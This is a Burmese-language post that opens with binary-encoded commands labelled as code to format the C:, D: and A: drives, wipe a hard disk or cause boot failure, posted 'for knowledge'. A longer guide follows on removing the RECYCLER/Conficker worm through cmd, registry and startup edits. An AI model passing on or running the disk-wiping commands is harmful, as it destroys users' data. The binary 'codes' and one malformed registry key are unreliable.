- Hard disk ကိုဖ်က္ဆီးႏိုင္သည္႕ Code
01001011000111110010 010101010101010000011111100000
- C: Partition ကို Format လုပ္ႏိုင္သည္႕ Code
01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000
- D: Partition ကို Format လုပ္ႏိုင္သည္႕ Code
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000
- A: Partition ကို Format လုပ္ႏိုင္သည္႕ Code
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000
- Boot Failure ျဖစ္ႏိုင္သည္႕ Code
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 10100101110001100010011011110110111101110100001011 10011010010110111001101001
တစ္ခုခုျဖစ္ရင္သားသားမပါဘူးေနာ္ ပညာရေစခ်င္လို႔ သိေစခ်င္လို႔ တင္ေပးထားတာပါေနာ္
သူတစ္ပါးအား ဒုကၡမေပးပါႏွင့္ ၀ဋ္ဆိုတာ ခ်က္ျခင္းလည္တက္ပါသည္ ။ေက်းဇူးတင္ပါသည္။


မိမိရဲ ့ကြန္ျပဴတာမွာ Recycler ဆိုတဲ့ Folder ကိုေတြ ့ျမင္တတ္ရပါတယ္။ အလြယ္ေျပာရရင္ေတာ့ Delete လုပ္တဲ့ ဖိုင္ေတြဟာက Recycle Bin ထဲမေရာက္ပဲ သူ ့ထဲမွာ ေရာက္ေနတာ မ်ိဳးပါ။ အဲဒီ Folder ကိုလည္းဖ်တ္လို ့မရပါဘူး။
ဒီလို ဆက္လုပ္ဗ်ာ...။Unlocker ဆိုတဲ့ software ကိုေအာက္မွာ download ခ်ျပီး scan ေပးလိုက္ပါ။ ဖ်က္လို႔မရတဲ့ Folder ကို Right ကလစ္ႏွိပ္ျပီး Unlocker ဆိုတာကိုေရြးေပးပါ...။
ဒီမွာ  ေဆာ ့၀ဲလ္ ေဒါင္းပါ..
ပံုမွာ ျပထားတဲ့အတိုင္း Delete ကိုေရြးျပီး OK ေပးလိုက္ပါ။ အဲဒါဆိုရင္ အဆင္ေျပ သြားပါလိမ့္မယ္။ အားလံုးပဲ Virus ရန္က ကင္းေဝးႏိုင္ၾကပါေစ...။

Recycle Virus ရွင္းနည္း...(၁)

Recycle Virus ေၾကာင့္ စိတ္ညစ္ေနတဲ့ သူငယ္ခ်င္းမ်ားအတြက္ ရွင္းရန္နည္းလမ္းေလးပါ...
ပထမအဆင့္အေနနဲ႕
Ctrl + Alt + Del ကိုနွိပ္ျပီး Windows Task Manager ျပီးတဲ့အခါ Processes Tab ကိုသြားပါ။
CTFMON.EXE ရွာျပီး End Task လိုက္ပါ။ျပီးရင္္ Start Menu ထဲက CTFMON.EXE ကိုရွာျပီး ျဖတ္လိုက္ပါ။



ဒုတိယအဆင့္ အေနနဲ႕ကေတာ့
Run ကိုသြားျပီး cmd လိုေရးျပီး Enter ေခါက္လိုက္ပါ။အမဲေရာင္ Window တခုေပၚလာပါလိမ့္မယ္။
ျပီးရင္အဲ့ဒီထဲမွာ ..
cd\ လို့ေရးျပီး Enter ႏွိပ္လိုက္ပါ။ attrib –r –s –h +a *.inf လို့္ေရးျပီး Enter ႏွိပ္လိုက္ပါ။
del autorun.inf လို့္ေရးျပီး Enter ႏွိပ္လိုက္ပါ။ attrib –r –s –h +a recycled လို့္ေရးျပီး Enter ႏွိပ္လိုက္ပါ။ cd recycled လို့္ေရးျပီး Enter ႏွိပ္လိုက္ပါ။ del *.* and confirm the deletion လို႕ေရးျပီး Enter ႏွိပ္လိုက္ပါ။ cd\ လို့္ေရးျပီး Enter ႏွိပ္လိုက္ပါ။ rmdir recycled လို့္ေရးျပီး Enter ႏွိပ္လိုက္ပါ။

အေပၚကအဆင့္ေတြကို ေက်ာ္သြားျပီးဆိုရင္ Recycler Virus ကေပ်ာက္သြားပါ့လိမ့္မယ္။
မွတ္ခ်က္၊ ၊ အေပၚက Code ေတြတခါေရးျပီး ရင္ Enter တခါေခါက္ပါ။
  unlocker ကို နဲ႔ အသံုးျပဳႏိုင္ပါတယ္...ခင္ဗ်ာ..
အားလံုး Virus ရန္မွ ကင္းေ၀းႏုိင္ၾကပါေစ ခင္ဗ်ာ...
RECYCLER Virus ရွင္းလင္းနည္း (၂)

ပထမအဆင့္အေနနဲ႔
Folder Option ထဲက View မွာ ေအာက္မွာေဖာ္ျပထားတဲ့ Item ေတြကို Uncheck ေပးထားလိုက္ပါ...။

>>display the contents of system folders

>>hide extensions for known file types

>>hide protected operating system files (Recommended)

ျပီးရင္ Apply > Ok

ဗိုင္းရပ္စ္က Registry ထဲထိ ၀င္ေနမယ္ဆိုရင္ေတာ့ ကြန္ျပဴတာ ျပန္ဖြင့္တိုင္းမွာ အသက္ျပန္ဝင္ေနမွာပဲျဖစ္ပါတယ္။ ဒါဆိုရင္ Registry ထဲကိုဝင္ျပီး ျပင္ဖို ့ လိုအပ္ပါတယ္...။ အဲဒါေၾကာင့္

>>Start>>Run>>regedit>>Enter
>>Registry Editor Box မွာ ဘယ္ဘက္မွာ HKEY_LOCAL_MACHINE>>SOFTWARE>>Microsoft>>Active Setup>>Installed Components
အထိေရာက္ေအာင္သြားၿပီးေတာ့ ဒီနာမည္နဲ႔ folder ကို
 {08B0E5C0-4FCB-11CF-AAX5-90401C608512} ဖ်က္ပစ္ပါ...။
ေနာက္တစ္ခုကေတာ့
>>Start>>Run>>msconfig>>Enter
System Configuration Utility  ဆိုတဲ့ box ေပၚလာမွာျဖစ္ပါတယ္...။
အဲ့ဒီ့က startup tab မွာ RECYCLER.exe ကိုရွာၿပီး အမွတ္ျခစ္ထားတာကို ...ျဖဳတ္ေပးပါ...။ ေနာက္ၿပီး
အဲ့ဒီ့ဖိုင္ ရိွတဲ့ လမ္းေၾကာင္းကိုၾကည့္ၿပီး အေပၚက Regedit Editor မွာသြားဖ်က္ေပးပါ...

RECYCLE Virus ရွင္းလင္းနည္း...(၃)


Recycler.exe ဗိုင္းရပ္စ္ဟာ jwgjvsq.vmx လို႔အမည္ေပးထားတဲ့ worm-type အမ်ိဳးအစားဗိုင္းရပ္စ္   ျဖစ္ပါတယ္။ အထူးသျဖင့္ USB/portable Drives တို႔က ကူးစက္သလို Network ကတစ္ဆင့္ ပ်ံ႕ႏွံ႔လာတယ္လို႔ သိရပါတယ္...။ ဖိုင္လ္ဒါနဲ႔အတူ autorun.inf ဆိုတဲ့ ဖိုလ္ဒါတစ္ခုကိုလည္း သတိျပဳမိပါလိမ့္ မယ္...။ ၎ folder မ်ားကို Hidden လုပ္ေဖ်ာက္ထားလို႔ ပံုမွန္အားျဖင့္ မျမင္ရပါ...။ ၎ Recycler folder ကို ထပ္ဖြင့္ၾကည့္ရင္ jwgkvsq.vmx ဆိုတဲ့ ဖိုင္ရွိပါတယ္...။ အဲဒီဒါဟာ ဗိုင္းရပ္စ္လား...၊ ဘယ္လိုကူးစက္   ေအာင္လုပ္ထားတယ္ဆိုတာ ေတာ့ ဖိုင္ကိုဆက္ၿပီး မဖြင့္ရဲလို႔ မသိပါဘူး...။ Anti-virus ေဆာ့ဖ္၀ဲလ္ အမ်ားစုက ၎ကို detect မလုပ္ႏိုင္သလို ဖ်က္လို႔လည္း မရပါ...။ အနီးဆံုးတူတ့ဲ ဗိုင္းရပ္စ္မ်ားကို ရွာၾကည့္တဲ့အခါ w32/confi, W32/Conficker.worm!inf, Win32/Conficker.B-CA လို႔ေတြ႔ရပါတယ္...။
အဲ့ဒါမ်ိဳးေတြ စက္ထဲ ကူးစက္ေနၿပီဆိုရင္....
၁) စက္ကသိသာစြာ ေလးလံေနွးေကြးသြားမွာပါ...။
၂) Network ခ်ိတ္ဆက္ထားတဲ့ ကြန္ပ်ဴတာမ်ားကိုလည္း ကူးစက္ပါတယ္...။
၃) USB မ်ားသို႔ ကူးစက္ပါတယ္...။ USB Port မွာလာတပ္တဲ့ USB Drive, Flash Drives, portable external hard drives, mobile phone, mp3 players စသည္တို႔ကိုလည္း ကူးပါလိမ့္မယ္...။
ဘာေတြျဖစ္မလဲဆိုေတာ့ “Show Hidden Files and Folders” အလုပ္မလုပ္ႏုိင္ေတာ့ပါ။ Tools/Folder Options/View (tab) က “Show hidden files and folders” ကိုေရြးခ်ယ္လိုက္ေပမယ့္ ျပန္ထြက္တဲ့အခါ “Do Not Show Hidden Files and Folders” ျပန္ျဖစ္သြားပါလိမ့္မယ္...။ ဒါဆိုရင္ ဗိုင္းရပ္စ္ကူးေနပါၿပီ...။
ကြန္ပ်ဴတာမွာ ခုနကေျပာတဲ့ Drives တပ္လိုက္တာနဲ႔ autorun.inf ဖိုင္နဲ႔ RECYCLER folder ကို တည္ေဆာက္ပါလိမ့္မယ္...။ အဲဒီအထဲမွာ jwgkvsq.vmx virus ဖိုင္က တခါတည္းပါသြားမွာပါ ...။
အဲ့ဒီအေကာင္ ၀င္ေရာက္ၿပီး အခ်ိန္ၾကာလာတာနဲ႕ အမွ် network သံုးလို႔မရေတာ့ပါဘူး...တစ္ခ်ိဳ႕ဆို အင္တာနက္ လိုင္းေတြနဲ႕ Viurs နဲ႕ဆိုင္တဲ့ Website ေတြေတာင္ ၀င္လို႔မရေတာ့ဘူးလို႔ဆိုပါတယ္...။
Safe Mode ၀င္ဖို႔ ႀကိဳးစားတိုင္း ကြန္ပ်ဴတာသည္ Restart ျပန္ျဖစ္ေနပါမယ္...။ဒါမွ မဟုတ္ shutdown ျဖစ္သြားပါလိမ့္မယ္...။...... အဲဒီ့အေကာင္ကိုေျဖရွင္းဖို႔

အဆင့္ (၁)
၁)“Fix Downadup.exe ”  တကယ္လို႔ ေဒါင္းလို႔မရရင္
၂)anti-Downadup-EN.zip
3) Process Explorer နဲ႔ Autoruns လိုအပ္တဲ့ ေဆာ့ဖ္၀ဲေတြရၿပီဆိုရင္ ကြန္ပ်ဴတာမွာ Network ေတြျဖဳတ္
ထားလိုက္ပါ...။ FixDownadup.exe ကို run ပါ...။ ၎သည္ ဗိုင္းရပ္စ္မ်ားကို ရွင္းထုတ္ႏိုင္ပါတယ္...။ Scanning လုပ္ၿပီးတာနဲ႔ Report ေပၚလာပါလိမ့္မယ္...။ ၎ Report မွာ W32.Downadup ကိုေအာင္ျမင္စြာ ဖယ္ထုတ္ၿပီးေၾကာင္း ေဖၚျပပါလိမ့္မယ္...။ ထို႔အတူ ကြန္ပ်ဴတာကို Restart ျပန္လုပ္ဖို႔နဲ႔ MS08-067 အတြက္ Patch ကို တင္ေပးမယ္လို႔ ျပပါမယ္...။ ကြန္ပ်ဴတာကို Restart ျပန္လုပ္ပါ...။

အဆင့္ (၂)
USB Device မ်ားမွ ဖယ္ထုတ္ျခင္း USBကေန jwgkvsq.vmx ဗိုင္းရပ္စ္ကို သတ္ရပါအံုးမယ္...။ ကြန္ပ်ဴတာကို Safe Mode နဲ႔ဖြင့္ပါ...(F8)။  ေပၚလာတဲ့ Menu ကေန Safe Mode ကိုေရြးခ်ယ္ပါ...။ USB Port မွာ USB Device ကိုတပ္ပါ...။ ရဲရဲသာတပ္လိုက္ပါ...Safe Mode မွာ autorun.inf ဖိုင္မပြင့္ပါဘူး...။ Tools/Folder Options/View(tab) ကေန “Show Hidden Files and Folders” ကိုဖြင့္ပါ...။ Autorun.inf ဖိုင္ သို႔မဟုတ္ folder ကို Shirt +Delete နဲ႕ဖ်က္ပါ...။ RECYCLER ဖိုလ္ဒါကိုလည္း ဖ်က္ပါ။

အဆင့္(၃)
RECYCLER ကိုဖ်က္ျခင္း
အထက္ေဖၚျပပါအတုိင္း ေဆာင္ရြက္ရာမွာ RECYCLER ဖိုလ္ဒါကို ဖ်က္မရပါက ၎ကိုအရင္ Disable လုပ္ၾကည့္ပါမယ္...။ Desktop ေပၚက Recycle Bin (icon) ကို Right Click ႏွိပ္ၿပီး Properties ကို ေရြးခ်ယ္ပါ...။ ၎တြင္ “Configure Drives Independently” ကိုေရြးခ်ယ္ပါ...။ ၿပီးေတာ့ External Drive ရွိရာသို႔ ေျပာင္းၿပီး “Do not move files to the recycle bin” ကိုေရြးခ်ယ္ပါ။ Apply. OK လုပ္ပါ...။ အကယ္၍ Flash Drive ျဖစ္ပါက MoSo Force Delete ေဆာ့ဖ္၀ဲကို အသံုးျပဳၿပီး Delete လုပ္ပါ။
အဲ့ဒီ့နည္းေတြနဲ႕မွ မရရင္ Unlocker ကိုသံုးၿပီး ဖ်က္ပစ္ပါ...။

အဆင့္ (၄ )
Registry  
Run (box) မွာ regedit လို႔ရိုက္ထည့္ၿပီး Registry Editor သို႔၀င္ပါ...။ Jwgkvsq.vmx ဖိုင္အမည္ကို ရွာပါ...။ ေတြ႔ရင္ Right Click လုပ္ၿပီး Delete လုပ္ပါ...။ တကယ္လို႔ သင့္ကြန္ပ်ဴတာမွာ Network ရွိတယ္ဆိုရင္ အျခားဆက္သြယ္ထားတဲ့ ကြန္ပ်ဴတာအားလံုးကိုလည္း စစ္ေဆးသင့္ပါတယ္...။ ဒါမွမဟုတ္ရင္ သင့္ကြန္ပ်ဴတာကို ဗိုင္းရပ္စ္ျပန္ကူးဖို႔ လြယ္ကူေနပါလိမ့္မယ္။ အားလံုးကို အဆင့္အတိုင္းသြားပါ...။ အရင္တင္ေပးတာေတြနဲ႕လည္း စမ္းသပ္ႏိုင္ပါတယ္...ကဲ သူငယ္ခ်င္းတို႔ Virus ႏွင့္ နပန္းလံုးျခင္းမွ ကင္းေ၀းႏိုင္ၾကပါေစဗ်ာ.....